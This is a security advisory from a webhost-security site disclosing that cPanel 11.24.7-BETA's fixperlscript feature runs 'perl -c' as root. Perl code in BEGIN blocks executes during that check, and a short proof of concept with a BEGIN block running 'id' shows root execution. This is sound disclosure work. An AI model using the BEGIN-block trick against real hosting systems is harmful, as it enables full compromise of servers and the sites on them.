WebhostSecurity.com
ARTICLES
› Lessons Learned - Defense
› Lessons Learned - Offense
› Finding Bugs 1 - Softaculous
› Finding Bugs 2 - cPanel + Horde
› uid/gid Reuse Multi Vendor Issue
› Finding the WordPress 2.1.1 Backdoor
› Discovering Cdorked.A on cPanel
OFFENSE
› AtMail
› BFD
› cPanel
› CSF
› DirectAdmin
› Installatron
› Juniper
› Kloxo
› OSSEC
› Softaculous
› WHMEZLogin
› WHMReseller
DEFENSE
› STFN - Suspicious /tmp File Notifier
› ELM - Exim Log Monitor
› RFID - Remote File Inclusion Detector
› Twitter


cPanel 11.24.7-BETA_34914 - /scripts/fixperlscript runs 'perl -c' as root, allowing for code execution via BEGIN blocks


DESCRIPTION

WHM contains a feature for the root user that checks the syntax of a specified perl script to ensure there are no errors. It does this by passing the '-c' option to the perl binary. Any perl code contained within BEGIN blocks is executed when perl -c is ran. Thus, since this feature failed to drop privileges, a malicious individual could request their webhost to click the link in WHM to check their (trojaned) perl script, completely compromising the local machine.


IMPACT

Full system compromise.


Running perl -c on code without a BEGIN block:

[root@host ~]# cat test.pl
#!/usr/bin/perl
system("/usr/bin/id > /home/user/id.out");
[root@host ~]# perl -c test.pl ; cat /home/user/id.out
test.pl syntax OK
cat: /home/user/id.out: No such file or directory


Running perl -c on code with a BEGIN block:

[root@host ~]# cat test.pl
#!/usr/bin/perl
BEGIN { system("/usr/bin/id > /home/user/id.out"); }
[root@host ~]# perl -c test.pl ; cat /home/user/id.out
test.pl syntax OK
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)


WebhostSecurity.com © 2009 - 2017